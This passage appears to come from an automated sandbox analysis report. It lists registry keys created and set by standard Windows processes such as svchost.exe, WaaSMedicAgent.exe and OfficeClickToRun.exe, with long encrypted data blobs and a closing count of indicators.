0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000004c4b263ce3325643a89d57a9b6291f6800000000020000000000106600000001000020000000a647653a5dcb2c97ac070e9e1e3edf8b3d645c52f06f0b2068110287e8006ba6000000000e8000000002000020000000cf6c3281d598bf19bfe380b14913891f6bf953674d910edb0a69e90b8b79f346b0030000bc469da87701c33b2cfd142ad2c2be3107db4c510f8cf66e042c3898a6770302b57e5994c6bd6cda4eb2325191199f1237fe3a4ba2a0d4e13eb589fc62d9c7c4d94b559fdbc1e77e7d7abf1bbf614c6ca0a90101f607cc3d12dc762aec6b93c4d3ba781912a4605558c54410be41aa08b478d8d50efa0015ca72e3912f7b78bfaf7a01d91767b07a859434136bf93437c81419b29c63f8c09245a4179c4ac39498c3eef3479be17ccda03dcc282d925bb7bff5170e75428e04c46aeb8ea4d617ed8e9068b8de53bc2bf0fd89e8beade6fac2dddeffd07849deee1d0eedf6a80e9ff91f447fa0162e5b0e3db8a205f00b8ef80623e38ceebdaa57ea094df654de1f435f7210ec3ef558a50f7b6259ba1b75d75a9a3d4a1e9a9b7da443db0aa172fe5f568e09ab46d4c637cf850e586fd515d1ee4d36aab80452cdf381c9fba59dede3678bee8406b9647ff63d6af5e2d059d06728f1fdc0c603b8d313507667942b14a552fd83b5193468e01944a4f5f0cec571f1b88209bf8b350fc4e475889474218b3c474c1b153b772e7cf91b8018d4972383643ca208c5ddba6b92a229d79d5c75baca1193b0cafded76f0860571259ec7c276bd9b293199ef428e8f427bb329187c42960d2b6db62c781e57364cbbfb72156de6b683b307e82a81f0a9a5c834185007bf48d357f83c110dde9f18952387fa3ab50a55ac1512aeef3f7ba4ff9c827de91a0b348b166f2dc747d58b67f7e4e53e938f743ca2368cb599ec080b6d1913b4daa5a4268bc69174c34547b859297af4f97cb0c513b272643422ac846f4cd7dbfe528eb45ad7f747a43db9e26daa6ad81bfcad7e5b1cba02108197232d33a25889885b70f4575d4f3efe3c657d645b4f11e4900f8b9efed24125aa972023d9ccbe88dce2e3469537baf986c0d71065a3e4a672eb8c281dc84d18f7a754d8b34c1387ac879e44b5c5353afdcb1ce2121e52af3faac335a295e5dd3b5e2a75702fc7e8b5789c6d9c068a51356b525a951ef3d908cdf9094a16b655ac9a82f89ffb3a4573fc61a5d1d9baebaa776dd8a07ae77c2eeedba830b748aba4383184983ba891cb6ae9711bc186bbafe68e69c844d73b7d9a9b0da156d7e2030c812f599ba12a1de0460260432f8fbc93ca1dac6745221c8dc3bbee1704a84663067750994778652fcd605e06b51a93273d30e27f847e8ae408018454addccf4ba6634ff3efdc848733d973180cc2ea20b3172cd0d56b60ba225e4b1658416134dd283b722bf7604145f0d308c920373a76992a3ab48fe5cc50d76764b99fe834a5bdc2a54c9a325cb35cbd6bd702e2400000007d5efd22d945438ec58214b2d1c4fb770c1cb1734e5dc26fa2e687b473620bf614726b0b1b40303739be7e610163c83b77bc6332ac8c238bbc70ec9ff998f3ce mousocoreworker.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty\Request Tuesday, December 03, 2024 09:46:56 = "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" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\ValidDeviceId svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02hffkmccggumxty\AppIdList svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02zffscyanttqogt\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 03 Dec 2024 09:48:21 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733219299" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02zffscyanttqogt\DeviceId = "<Data><User username=\"02ZFFSCYANTTQOGT\"/></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02zffscyanttqogt\DeviceId = "<Data><User username=\"02ZFFSCYANTTQOGT\"><HardwareInfo BoundTime=\"1733219218\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02oqduuijzvltxfy" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02oqduuijzvltxfy svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02oqduuijzvltxfy\DeviceId = "<Data LastUpdatedTime=\"1733219212\"><User username=\"02OQDUUIJZVLTXFY\"/></Data>\r\n" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02oqduuijzvltxfy\Provision Tuesday, December 03, 2024 09:46:51 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAATEsmPOMyVkOonVeptikfaAAAAAACAAAAAAAQZgAAAAEAACAAAABQWM2EVyl0UfHLeXt5+H13VBdR3Iht7uUWQ1yOc3YlVgAAAAAOgAAAAAIAACAAAADlyIxeIdfUS/EfRmG1mZ8dcriALonI8FKy+RW0V6ZLXSAAAACexghV2f8ruP6wDEJdS5mm5BETMl7+OMsS1yx8+IRaHkAAAABsl2zTFiS09jzE7HEKSmkn1uXixHDv8bYs2M2FoH9+/YHffcQhYm+2C0K2sWujhj6dVAhyfB30Bzy3P4/XKfdb" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00184011ADE07956" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty\Response Tuesday, December 03, 2024 09:46:56 = "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" svchost.exe -
Modifies registry class 27 IoCs
